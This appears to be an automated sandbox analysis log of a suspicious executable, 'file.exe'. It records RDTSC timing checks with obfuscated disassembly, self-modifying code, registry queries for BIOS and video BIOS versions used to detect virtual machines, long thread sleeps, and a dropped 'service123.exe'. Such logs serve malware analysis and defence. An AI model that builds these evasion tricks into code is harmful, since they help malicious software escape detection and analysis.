Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600E9B second address: 7600ED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007F1F81013DB6h 0x0000000c popad 0x0000000d nop 0x0000000e jmp 00007F1F81013DB0h 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600ED1 second address: 7600ED7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600ED7 second address: 7600EDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600F53 second address: 7600FB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D7764Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-14h] 0x0000000c jmp 00007F1F80D77656h 0x00000011 mov ecx, esi 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F1F80D7764Eh 0x0000001a add al, FFFFFFE8h 0x0000001d jmp 00007F1F80D7764Bh 0x00000022 popfd 0x00000023 mov cx, 17DFh 0x00000027 popad 0x00000028 mov dword ptr [esi+0Ch], eax 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F1F80D77651h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600FB7 second address: 7600FBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600FBD second address: 7600FFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D77653h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, 759B06ECh 0x00000010 pushad 0x00000011 push eax 0x00000012 push ebx 0x00000013 pop esi 0x00000014 pop edx 0x00000015 mov ecx, 6910FE43h 0x0000001a popad 0x0000001b sub eax, eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F1F80D77652h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7600FFC second address: 7601042 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock cmpxchg dword ptr [edx], ecx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F1F81013DB4h 0x00000014 jmp 00007F1F81013DB5h 0x00000019 popfd 0x0000001a push eax 0x0000001b push edx 0x0000001c mov ecx, 6861232Dh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601042 second address: 760106F instructions: 0x00000000 rdtsc 0x00000002 mov cx, C529h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dh, 58h 0x0000000f pushfd 0x00000010 jmp 00007F1F80D7764Ah 0x00000015 and eax, 226072F8h 0x0000001b jmp 00007F1F80D7764Bh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760106F second address: 7601094 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov dx, ax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601094 second address: 76010F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D77656h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d popad 0x0000000e jne 00007F1FEF0A5C6Fh 0x00000014 jmp 00007F1F80D7764Ah 0x00000019 mov edx, dword ptr [ebp+08h] 0x0000001c pushad 0x0000001d mov ax, B43Dh 0x00000021 mov edx, ecx 0x00000023 popad 0x00000024 mov eax, dword ptr [esi] 0x00000026 jmp 00007F1F80D77654h 0x0000002b mov dword ptr [edx], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F1F80D7764Ah 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76010F4 second address: 76010F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76010F8 second address: 76010FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76010FE second address: 760116D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+04h] 0x0000000c jmp 00007F1F81013DB0h 0x00000011 mov dword ptr [edx+04h], eax 0x00000014 jmp 00007F1F81013DB0h 0x00000019 mov eax, dword ptr [esi+08h] 0x0000001c jmp 00007F1F81013DB0h 0x00000021 mov dword ptr [edx+08h], eax 0x00000024 jmp 00007F1F81013DB0h 0x00000029 mov eax, dword ptr [esi+0Ch] 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F1F81013DAAh 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760116D second address: 760117C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D7764Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760117C second address: 7601194 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F81013DB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601194 second address: 7601198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601198 second address: 76011EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+0Ch], eax 0x0000000b jmp 00007F1F81013DB7h 0x00000010 mov eax, dword ptr [esi+10h] 0x00000013 jmp 00007F1F81013DB6h 0x00000018 mov dword ptr [edx+10h], eax 0x0000001b pushad 0x0000001c mov bx, cx 0x0000001f mov bx, si 0x00000022 popad 0x00000023 mov eax, dword ptr [esi+14h] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov ax, bx 0x0000002c push edx 0x0000002d pop eax 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76011EA second address: 76011F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76011F0 second address: 7601210 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+14h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1F81013DB3h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601210 second address: 7601236 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D77659h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+18h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601236 second address: 760123A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760123A second address: 7601240 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601240 second address: 7601264 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+18h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx edi, cx 0x00000012 mov si, 7F25h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601264 second address: 76012E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 jmp 00007F1F80D7764Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esi+1Ch] 0x00000010 pushad 0x00000011 mov cx, 5013h 0x00000015 mov cx, DA6Fh 0x00000019 popad 0x0000001a mov dword ptr [edx+1Ch], eax 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F1F80D77657h 0x00000024 or ecx, 6F5EF6AEh 0x0000002a jmp 00007F1F80D77659h 0x0000002f popfd 0x00000030 popad 0x00000031 mov eax, dword ptr [esi+20h] 0x00000034 pushad 0x00000035 jmp 00007F1F80D7764Ch 0x0000003a mov bx, si 0x0000003d popad 0x0000003e mov dword ptr [edx+20h], eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76012E0 second address: 76012E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76012E6 second address: 7601333 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D77650h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+24h] 0x0000000c jmp 00007F1F80D77650h 0x00000011 mov dword ptr [edx+24h], eax 0x00000014 jmp 00007F1F80D77650h 0x00000019 mov eax, dword ptr [esi+28h] 0x0000001c pushad 0x0000001d push eax 0x0000001e mov si, bx 0x00000021 pop edi 0x00000022 popad 0x00000023 mov dword ptr [edx+28h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601333 second address: 7601337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601337 second address: 760133D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760133D second address: 7601342 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601342 second address: 7601361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov esi, 5F70BDC7h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ecx, dword ptr [esi+2Ch] 0x0000000f jmp 00007F1F80D7764Ah 0x00000014 mov dword ptr [edx+2Ch], ecx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601361 second address: 760144E instructions: 0x00000000 rdtsc 0x00000002 call 00007F1F81013DB3h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushfd 0x0000000b jmp 00007F1F81013DB9h 0x00000010 xor cx, 55C6h 0x00000015 jmp 00007F1F81013DB1h 0x0000001a popfd 0x0000001b popad 0x0000001c mov ax, word ptr [esi+30h] 0x00000020 pushad 0x00000021 push eax 0x00000022 mov ax, di 0x00000025 pop ebx 0x00000026 call 00007F1F81013DB4h 0x0000002b mov ch, ADh 0x0000002d pop edx 0x0000002e popad 0x0000002f mov word ptr [edx+30h], ax 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007F1F81013DB8h 0x0000003a xor al, FFFFFFF8h 0x0000003d jmp 00007F1F81013DABh 0x00000042 popfd 0x00000043 mov bh, ch 0x00000045 popad 0x00000046 mov ax, word ptr [esi+32h] 0x0000004a jmp 00007F1F81013DABh 0x0000004f mov word ptr [edx+32h], ax 0x00000053 jmp 00007F1F81013DB6h 0x00000058 mov eax, dword ptr [esi+34h] 0x0000005b pushad 0x0000005c pushfd 0x0000005d jmp 00007F1F81013DAEh 0x00000062 xor ax, 10B8h 0x00000067 jmp 00007F1F81013DABh 0x0000006c popfd 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 pop edx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760144E second address: 7601480 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F1F80D77652h 0x00000008 and si, 4B18h 0x0000000d jmp 00007F1F80D7764Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov dword ptr [edx+34h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601480 second address: 7601484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601484 second address: 7601488 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601488 second address: 760148E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760148E second address: 760150B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D7764Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, 00000700h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F1F80D7764Eh 0x00000016 sub ax, ECA8h 0x0000001b jmp 00007F1F80D7764Bh 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007F1F80D77658h 0x00000027 xor cx, DF08h 0x0000002c jmp 00007F1F80D7764Bh 0x00000031 popfd 0x00000032 popad 0x00000033 jne 00007F1FEF0A586Fh 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F1F80D77655h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 760150B second address: 7601511 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601511 second address: 7601515 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601515 second address: 7601590 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b or dword ptr [edx+38h], FFFFFFFFh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F1F81013DB4h 0x00000016 jmp 00007F1F81013DB5h 0x0000001b popfd 0x0000001c mov bx, ax 0x0000001f popad 0x00000020 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000024 pushad 0x00000025 push eax 0x00000026 mov di, 4CCAh 0x0000002a pop edx 0x0000002b mov dx, si 0x0000002e popad 0x0000002f or dword ptr [edx+40h], FFFFFFFFh 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F1F81013DB9h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7601590 second address: 76015B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 call 00007F1F80D77653h 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 movzx eax, bx 0x00000016 movsx edx, ax 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76015B8 second address: 76015BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76015BE second address: 76015C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76303FB second address: 76303FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 76303FF second address: 7630405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75E0A39 second address: 75E0A3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75E0A3F second address: 75E0A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75E0A43 second address: 75E0A83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F1F81013DADh 0x00000015 and ecx, 29623BD6h 0x0000001b jmp 00007F1F81013DB1h 0x00000020 popfd 0x00000021 movzx eax, di 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75E0A83 second address: 75E0AA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F80D77659h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75E0AA0 second address: 75E0AA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75E0AA4 second address: 75E0ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov dx, 5D6Ch 0x00000010 jmp 00007F1F80D77655h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75E0ACA second address: 75E0AD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75E0AD0 second address: 75E0AD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D0029 second address: 75D0071 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F1F81013DAEh 0x0000000f push eax 0x00000010 jmp 00007F1F81013DABh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F1F81013DB5h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D0071 second address: 75D0081 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1F80D7764Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D0081 second address: 75D0085 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D0085 second address: 75D0095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D0095 second address: 75D0099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D0099 second address: 75D009F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D009F second address: 75D00A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 47172734h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D00A9 second address: 75D00B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 and esp, FFFFFFF0h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D00B9 second address: 75D00BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D00BD second address: 75D00C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D00C1 second address: 75D00C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D00C7 second address: 75D00EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F80D7764Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 44h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1F80D7764Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D00EA second address: 75D00F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D00F0 second address: 75D00F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D00F4 second address: 75D0114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop esi 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D0114 second address: 75D011A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D011A second address: 75D015F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F1F81013DB7h 0x00000010 xor cx, 9EEEh 0x00000015 jmp 00007F1F81013DB9h 0x0000001a popfd 0x0000001b push eax 0x0000001c push edx 0x0000001d mov dh, cl 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D015F second address: 75D0193 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F1F80D77653h 0x00000008 jmp 00007F1F80D77653h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 75D0193 second address: 75D01AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F81013DB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 11049D1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 12A2285 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 12B9B3B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 13387F0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1009
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1841
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1789
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1793
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1810
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.2 %
Source: C:\Users\user\Desktop\file.exe TID: 5532 Thread sleep count: 52 > 30
Source: C:\Users\user\Desktop\file.exe TID: 5532 Thread sleep time: -104052s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 4668 Thread sleep count: 48 > 30
Source: C:\Users\user\Desktop\file.exe TID: 4668 Thread sleep time: -96048s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6524 Thread sleep count: 1009 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6524 Thread sleep time: -2019009s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6128 Thread sleep count: 1841 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6128 Thread sleep time: -3683841s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 984 Thread sleep count: 1789 > 30
Source: C:\Users\user\Desktop\file.exe TID: 984 Thread sleep time: -3579789s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 4760 Thread sleep count: 1793 > 30
Source: C:\Users\user\Desktop\file.exe TID: 4760 Thread sleep time: -3587793s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6552 Thread sleep count: 1810 > 30
Source: C:\Users\user\Desktop\file.exe TID: 6552 Thread sleep time: -3621810s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 7584 Thread sleep count: 285 > 30
